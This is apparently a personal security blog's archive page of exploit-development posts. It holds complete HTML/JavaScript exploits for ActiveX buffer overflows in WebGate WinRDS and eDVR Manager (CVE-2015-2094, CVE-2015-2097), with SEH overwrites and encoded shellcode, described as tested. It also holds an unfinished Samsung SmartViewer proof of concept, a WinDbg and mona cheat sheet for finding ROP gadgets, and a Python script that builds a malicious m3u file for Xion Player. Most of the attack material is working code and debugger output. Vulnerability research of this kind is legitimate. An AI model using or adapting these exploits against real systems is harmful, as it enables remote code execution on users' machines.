Security Unplugged !!!: reverse engineering

Showing posts with label reverse engineering. Show all posts

Saturday, March 28, 2015

CVE-2015-2094: WebGate WinRDS WESPPlayback.WESPPlaybackCtrl.1 StopSiteAllChannel Stack Buffer Overflow Remote Code Execution Vulnerability (0Day)

During PoC testing, to check stack alignment with below assignment
nseh = "DDDD";
var seh = "EEEE";

Process attachProcess attachProcess attach end(3eb4.39f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000e20 ebx=00000041 ecx=0329fc34 edx=00002711 esi=77c50041 edi=020bf1e0
eip=77c1dcbf esp=020bf178 ebp=020bf1a0 iopl=0 nv up ei ng nz ac pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210297
msvcrt!__wcstombs_mt+0x56:
77c1dcbf 881c07 mov byte ptr [edi+eax],bl ds:0023:020c0000=4d
0:008> !exchain
020bf260: 45454545
Invalid exception stack at 44444444
0:008> d 020bf260
020bf260 44 44 44 44 45 45 45 45-90 90 90 90 90 90 90 90 DDDDEEEE........
020bf270 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
020bf280 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
020bf290 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
020bf2a0 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
020bf2b0 90 90 90 90 90 90 90 90-41 41 41 41 41 41 41 41 ........AAAAAAAA
020bf2c0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
020bf2d0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0:008> d fs:[0]
003b:00000000 60 f2 0b 02 00 00 0c 02-00 00 0b 02 00 00 00 00 `...............
003b:00000010 00 1e 00 00 00 00 00 00-00 60 fd 7f 00 00 00 00 .........`......
003b:00000020 b4 3e 00 00 f8 39 00 00-00 00 00 00 00 00 00 00 .>...9..........
003b:00000030 00 80 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000040 f0 3c 24 e1 00 00 00 00-00 00 00 00 00 00 00 00 .<$.............
003b:00000050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000060 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000070 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

Module info :
---------------------------------------------------------------------------------
Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
---------------------------------------------------------------------------------
0x00870000 | 0x00ffa000 | 0x0078a000 | True | True | False | False | True | 6.0.1 [IPPDecoder.dll] (C:\WINDOWS\system32\WESPSDK\IPPDecoder.dll)
0x10000000 | 0x100e0000 | 0x000e0000 | False | False | False | False | True | 1.6.42.0 [WESPPlayback.dll]
0x1007f29e : pop ebx # retn # pop esi # xor al,al # pop ebx # retn | {PAGE_EXECUTE_READ} [WESPPlayback.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.6.42.0 (C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll)

Final Exploit

<html>
<title>WebGate WinRDS WESPPlayback.WESPPlaybackCtrl.1 StopSiteAllChannel Stack Buffer Overflow Vulnerability (0Day)</title>
<!--
targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
prototype  = "Sub StopSiteAllChannel ( ByVal SiteSerialNumber As String )"
progid     = "WESPPLAYBACKLib.WESPPlaybackCtrl"
Vulnerable Product = WinRDS 2.0.8
Software = http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36
-->
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='ssac'>
</object>
<script>

var buff1 = "";
var nops = "";
var buff2 = "";

for (i=0;i<128; i++)
{
 buff1 += "B";
}

nseh = "\xeb\x08PD";
var seh = "\xa0\xf2\x07\x10";
for (i=0;i<80; i++)
{
 nops += "\x90";
}
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for (i=0;i<(5000 - (buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)
{
 buff2 += "A";
}

fbuff = buff1 + nseh + seh + nops + sc + buff2;
ssac.StopSiteAllChannel(fbuff);

</script>
</html>

Refer below link for other WebGate exploit
http://blog.disects.com/2015/03/webgate-edvr-manager.html

Wednesday, March 25, 2015

WebGate eDVR Manager WESPMonitor.WESPMonitorCtrl LoadImage Stack Buffer Overflow Remote Code Execution (CVE-2015-2097)

WEBGATE Embedded Standard Protocol (WESP) SDK has multiple Remote Code Execution Vulnerabilities in different ActiveX controls.

Use below mona command to find pop pop ret address which creates findwild.txt at C:\Program Files\Immunity Inc\Immunity Debugger
!mona findwild -s "pop r32#*#pop r32#*#ret"

Snip of findwild.txt (addresses which I tried to use)
0x10079740 : pop esi # xor al,al # pop ebx # retn | {PAGE_EXECUTE_READ} [WESPMonitor.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.6.42.0 (C:\WINDOWS\system32\WESPSDK\WESPMonitor.dll)
0x100580bd : pop ebp # pop ebx # mov dword ptr fs:[0],ecx # add esp,34 # retn | {PAGE_EXECUTE_READ} [WESPMonitor.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.6.42.0 (C:\WINDOWS\system32\WESPSDK\WESPMonitor.dll)
0x1007973e : pop ebx # retn # pop esi # xor al,al # pop ebx # retn | {PAGE_EXECUTE_READ} [WESPMonitor.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.6.42.0 (C:\WINDOWS\system32\WESPSDK\WESPMonitor.dll)
0x1001a561 : pop ebp # mov byte ptr ds:[edx+c],1 # mov al,1 # pop ebx # retn | {PAGE_EXECUTE_READ} [WESPMonitor.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.6.42.0 (C:\WINDOWS\system32\WESPSDK\WESPMonitor.dll)
0x10014771 : pop ebx # pop ebp # retn | ascii {PAGE_EXECUTE_READ} [WESPMonitor.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.6.42.0 (C:\WINDOWS\system32\WESPSDK\WESPMonitor.dll)
0x7c915242 : pop edi # pop esi # pop ebx # pop ebp # retn | {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ntdll.dll)

I was trying to pick calc.exe shellcode from previous exploits which somehow didn't work, might be due to presence of bad characters (assuming) so ended up in generating payload using Metasploit.

To Make sure we are pointing to shellcode modify nseh = "\xeb\x10\x90\x90"
to nseh = "\xcc\xcc\xeb\x10";
where \xcc is an opcode which acts as breakpoint.

Following "pop pop ret" address always getting modified to a different address and seeing below error in WinDBG.
0013df5c: WESPMonitor!CxImage::`copy constructor closure'+13d20 (10073f40)

0x10079740 changes to 0x10073f40
0x100580bd changes to 0x10053fbd
0x1007973e changes to 0x10073f3e
0x7c915242 changes to 0x7c3f5242 in ntdll

After few trial and error method found below address which doesn't have problem mentioned above might be due to the bad character issue where application is considering \x80 to \x9f as bad!
0x1001a561
0x10014771
Bad characters might cause issues while executing shellcode, those characters can be found using below technique.
http://blog.disects.com/2014/04/exploitation-identifying-bad-characters.html

>u 10079740
10079740 5e pop esi
10079741 32c0 xor al,al
10079743 5b pop ebx
10079744 c3 ret

Final Exploit

<html>
<!--
targetFile = "C:\Windows\System32\WESPSDK\WESPMonitor.dll"
prototype  = "Sub LoadImage ( ByVal bstrFullPath As String )"
memberName = "LoadImage"
progid     = "WESPMONITORLib.WESPMonitorCtrl"
argCount   = 1
-->

<object classid='clsid:B19147A0-C2FD-4B1F-BD20-3A3E1ABC4FC3' id='target'>
</object>
<script>
var arg1 = "";
nops = "";
var buff = "";

for(i=0;i<268;i++)
{
 arg1 += "B";
}

nseh = "\xeb\x10\x90\x90";  //jmp over addr
seh = "\x71\x47\x01\x10";  //pop pop ret addr
document.write("</br>"+"Lengths: arg1="+arg1.length+" seh="+seh.length+"</br>");

for(i=0;i<200;i++)
{
 nops += "\x90";
}

//bad cahrs = 80,82-89, 8a 8b 8c, 8e, 91-99, 9a 9b 9c 9e 9f
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";

for(i=0;i<(4000-(arg1.length + seh.length + nseh.length + nops.length+ sc.length));i++)
{
 buff += "A";
}

// [ Junk buffer ][ next SEH ][ SE Handler ][ Shellcode ]
fbuff = arg1 + nseh + seh + nops + sc  + buff;
target.LoadImage(fbuff);

</script>
</html>

Below is the stack trace at first point exception
(33c.6d8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000f41 ebx=001b012c ecx=020fe0b1 edx=02100000 esi=020fd218 edi=00001f42
eip=1004ae5b esp=020fd218 ebp=020ff280 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
*** WARNING: Unable to verify checksum for C:\WINDOWS\System32\WESPSDK\WESPMonitor.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\System32\WESPSDK\WESPMonitor.dll -
WESPMonitor!DllUnregisterServer+0x2094b:
1004ae5b 8802 mov byte ptr [edx],al ds:0023:02100000=4d
0:008> !exchain
020ff274: WESPMonitor!CAudioRenderer::CloseAudio+11a61 (10014771)
Invalid exception stack at 909010eb
0:008> d fs:[0]
003b:00000000 74 f2 0f 02 00 00 10 02-00 00 0f 02 00 00 00 00 t...............
003b:00000010 00 1e 00 00 00 00 00 00-00 50 fd 7f 00 00 00 00 .........P......
003b:00000020 3c 03 00 00 d8 06 00 00-00 00 00 00 00 00 00 00 <...............
003b:00000030 00 e0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000040 70 98 8e e1 00 00 00 00-00 00 00 00 00 00 00 00 p...............
003b:00000050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000060 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000070 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0:008> u 10014771
WESPMonitor!CAudioRenderer::CloseAudio+0x11a61:
10014771 5b pop ebx
10014772 5d pop ebp
10014773 c3 ret
0:008> d 020ff274
020ff274 eb 10 90 90 71 47 01 10-90 90 90 90 90 90 90 90 ....qG..........
020ff284 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
020ff294 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
020ff2a4 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
020ff2b4 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
020ff2c4 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
020ff2d4 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
020ff2e4 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................

If you continue execution after first chance exception we will be greeted with a calculator :-)

This exploit is tested on Windows XP SP3 with IE6, IE7 and IE8.
This is tested and successfully executed when DEP is enabled.

This post is incomplete if I don't thank Peter Van Eeckhoutte aka corelanc0d3r.

Next, DEP bypass!!

Sunday, January 18, 2015

Samsung SmartViewer BackupToAvi Remote Code Execution PoC (CVE-2014-9265)

This blog is about CVE-2014-9265.
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265

What Samsung says about the software
"SmartViewer is DVR management software that enables you to connect to and control a remote Samsung DVR on your PC via the network. With this tool, you can access Samsung DVRs anywhere around the world via the network, and check the video data from the connected cameras. You can also search for and play recording data in the DVR on a remote site, which will be an effective and convenient monitoring system."

Lets load single vulnerable DLL , C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll into ImmunityDBG.

mona plugins help can be viewed with below command
!mona
modules / mod | Show all loaded modules and their properties
unicodealign / ua | Generate venetian alignment code for unicode stack buffer overflow
Displays the list of all the loaded modules and their properties (ASLR, SafeSEH etc).
!mona modules
0BADF00D ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D Module info :
0BADF00D ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
0BADF00D ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D 0x774d0000 | 0x7754b000 | 0x0007b000 | True | True | True | True | True | 6.1.7600.16385 [COMDLG32.dll](C:\Windows\system32\COMDLG32.dll)
0BADF00D 0x10000000 | 0x1017b000 | 0x0017b000 | False | False | False | False | False | 2.0.1.6 [CNC_Ctrl_STW.dll] (C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll)
0BADF00D 0x75c60000 | 0x75d34000 | 0x000d4000 | True | True | True | True | True | 6.1.7600.16385 [kernel32.dll] (C:\Windows\system32\kernel32.dll)

!mona ua
will generate venetian_alignment.txt at C:\Program Files\Immunity Inc\Immunity Debugger\

mona command to search for addresses with pop/pop/ret
!mona findwild -s "pop r32#*#pop r32#*#retn"
Above command will generate findwild.txt file located at
C:\Program Files\Immunity Inc\Immunity Debugger\

Only one address(shown below) which has unicode compatibility is useful to us.
0x10008700 : pop ecx # mov eax,esi # pop esi # retn 4 | null,unicodereverse {PAGE_EXECUTE_READ} [CNC_Ctrl_STW.dll] ASLR: False, Rebase: False, SafeSEH:
False, OS: False, v2.0.1.6 (C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll)

Conditional breakpoint can be set using, assuming EIP holds 0x10008700 though EIP is having 0x00100087
bp 10008700 "j @eip=0x10008700 ; 'g' "

Finding offset to EIP
Initially pass a character string of length 15000 to BackupToAvi API, use Metasploit cyclic pattern to find the offset where EIP is overwritten, in my case it is offset 156. To find offset execute !exchain", search for the characters located at address 0x045ad62c, im metasploit cyclic pattern to get the offset.

Once we know the offset to seh, nseh we can write a PoC as shown below

<html>
<head> Samsung SmartViewer BackupToAvi Remote Code Execution</head>
<title> PoC developed by Praveen Darshanam </title>
<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' >
</object>

<script >
 var payload_length = 15000;
 var arg1=1;
 var arg2=1;
 var arg3=1;
 //blank strings
 var junk = "";
 var buf1 = "";
 var buf2 = "";

 //offset to SE is 156, initial analysis using metasploit cyclic pattern
 for (i=0; i<156; i++)
 {
  buf1 += "A";
 }

 var nseh = "DD";
//vulnerable DLL
var seh = "\x87\x10"; //pop, pop, ret
 junk = buf1 + nseh + seh;

 //remaining buffer
 for (j=0; j<(payload_length-junk.length); j++)
 {
  buf2 += "B";
 }
 var fbuff = junk + buf2;
 target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff);

</script>
</html>

When we open above html file in browser, we get below trace
Tested on Windows 7 Ultimate N SP1 using Internet Explorer 8)

(c6c.418): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=00450045 edx=773771cd esi=00000000 edi=00000000
eip=00450045 esp=043b10a8 ebp=043b10c8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
00450045 ?? ???

0:005> !exchain
....
045abacc: ntdll!ExecuteHandler2+3a (773771cd)
045abeb4: ntdll!ExecuteHandler2+3a (773771cd)
045ac29c: ntdll!ExecuteHandler2+3a (773771cd)
045ac684: ntdll!ExecuteHandler2+3a (773771cd)
045ad62c: 00450045
Invalid exception stack at 00440044

0:005> d 045ad62c
045ad62c 44 00 44 00 45 00 45 00-42 00 42 00 42 00 42 00 D.D.E.E.B.B.B.B.
045ad63c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
045ad64c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
045ad65c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
045ad66c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
045ad67c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
045ad68c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
045ad69c 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.

Couldn't write working exploit because of the issues mentioned below.
Issue1:
None of the registers are pointing to controlled buffer at the time of crash, can be verified using "d reg_name" on windbg cli where reg_name might be eax, ebx, esp, edi etc.

var nseh = "DD";
var seh = "\x87\x10"; //0x10008700
045ad62c 44 00 44 00 87 00 10 00-42 00 42 00 42 00 42 00 D.D.....B.B.B.B.

Issue2:
0x10008700 points to pop/pop/ret but eip is getting 0x00100087 instead of 0x10008700

Facing issue 2 on Windows XP Pro SP3 also
0:008> !exchain
020bf798: 00100087
Invalid exception stack at 00440044
0:008> d 020bf798
020bf798 44 00 44 00 87 00 10 00-42 00 42 00 42 00 42 00 D.D.....B.B.B.B.
020bf7a8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
020bf7b8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
020bf7c8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
020bf7d8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
020bf7e8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
020bf7f8 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
020bf808 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.

Any hints to develop working exploit are most welcome!

Wednesday, December 31, 2014

Useful windbg and mona commands for exploit writing

Find opcodes of instructions, say, "jmp esp"
0:000>a //press Enter key once
Input>jmp esp //press Enter key once
7c901214 jmp esp
0:000> u 7c901214
ntdll!DbgUserBreakPoint+0x2:
7c901214 ffe4 jmp esp

So "ffe4" are the opcodes for "jmp esp"

Opcode Instruction
b0 01   mov al,1
c3   ret
0:000> s -b 0x00000000 L?0xffffffff "b001c3"
Syntax error at '"b001c3"'
0:000> s -b 0x00000000 L?0xffffffff b0 01 c3
77eda3fa b0 01 c3 90 90 90 90 90-8b 41 14 66 8b 08 f6 c1
7c80c190 b0 01 c3 90 90 90 90 90-8b ff 55 8b ec 8b 45 0c
0:000> u 77eda3fa
RPCRT4!NDR_PIPE_HELPER32::GotoNextParam+0x1b:
77eda3fa b001 mov al,1

Opcode Instruction
b0 01   mov al,1
c3   ret n
0:000> s -b 0x00000000 L?0xffffffff b0 01 c2
71a517a1 b0 01 c2 0c 00 90 90 90-90 90 ff 25 18 70 a8 71 ...........%.p.q
77eda6b2 b0 01 c2 08 00 90 90 90-90 90 32 c0 c3 90 90 90 ..........2.....
7c9518ea b0 01 c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56 ............U..V
0:000> u 71a517a1
mswsock+0x17a1:
71a517a1 b001 mov al,1
71a517a3 c20c00 ret 0Ch

push esp / pop ebp / ret
0:000> s -b 0x00000000 L?0xffffffff 54 5D c2
77eedc68 54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56 T]..........U..V
77eee353 54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56 T]..........U..V
77eee7b3 54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 51 T]..........U..Q
77eeecd6 54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 6a T]..........U..j
77eeee84 54 5d c2 04 00 90 90 90-90 90 8b ff 55 8b ec 56 T]..........U..V

Random mona commands, might be useful during exploit writing
!mona suggest
!mona assemble -s "mov eax#ret"

Find all executable locations that have a pointer to “jmp ecx”
!mona find -type instr -s "jmp ecx" -p2p -x X

Search for a push (any register), later followed by pop eax, directly followed by inc eax, ending the chain with a retn
!mona findwild -s "push r32#*#pop eax#inc eax#*#retn"

!mona findwild -s "mov r16#*#retn"

ROP gadgets from all loaded DLL's
!mona rop -n -o

ROP gadget from specific DLL
!mona rop -m msvcr71.dll -n

ROP gadgets without bad characters
!mona rop -m msvcr71.dll -n -cpb '\x00\x0a\x0d'

Find stackpivot at offset 1500
!mona stackpivot -n -o -distance 1500

https://labs.snort.org/awbo/windbg.txt
http://windbg.info/doc/1-common-cmds.html
http://blog.disects.com/2014/04/windbg-useful-debugging-commands.html

Friday, December 12, 2014

Xion Player Unicode Exploit

Unicode Exploitation Techniques

Below instructions make us point to shellcode
0012F2D0 50 PUSH EAX
0012F2D1 006D 00 ADD BYTE PTR SS:[EBP],CH
0012F2D4 C3 RETN

#!c:\python27\python.exe
import struct

total_buf_size=5000
# 228 offset
buf1 = "A" * 228
#nseh = "MM"
nseh = "\x61\x62"
# seh = "NN"
seh = "\x15\x45"
print "seh: ", len(seh)

prep_stack = "D"
prep_stack = prep_stack + "\x6e" #nop/align
prep_stack = prep_stack + "\x55" #push ebp
prep_stack = prep_stack + "\x6e" #nop/align
prep_stack = prep_stack + "\x58" #pop eax=> ebp into eax
prep_stack = prep_stack + "\x6e" #pop/align
prep_stack = prep_stack + "\x05\x14\x11" #add eax,11001400
prep_stack = prep_stack + "\x6e" #pop/align
prep_stack = prep_stack + "\x2d\x13\x11" #sub eax,11001300
prep_stack = prep_stack + "\x6e" #pop/align
print "prep_stack len=", len(prep_stack)

prep_jump = "\x50"  #push eax
prep_jump = prep_jump + "\x6d"  #nop/align
prep_jump = prep_jump + "\xc3"  #ret
print "prep_jump len=", len(prep_jump)


# offset between the last instruction 0012f3ac and
# our venetian jumpcode (c3 = ret) 0012f2d4
# to make sure shellcode is at eax
loca = "D"*107

shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NLMPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18VNQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JBR84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOTNDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEMKOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERCQQ2LRCM0LJA"

remaining_buf = "D" * (total_buf_size -(len(buf1) + len(nseh)+len(seh)+len(prep_stack)+len(prep_jump) + len(loca) + len(shellcode)))
payload = buf1 + nseh + seh + prep_stack + prep_jump + loca + shellcode + remaining_buf
print "Payload length ", len(payload)

try:
  fh = open("xion_uni_m3u.m3u", "w")
  fh.write(payload)
  fh.close()
except:
  print "Unable to create m3u file!\n"

To Generate cyclic pattern
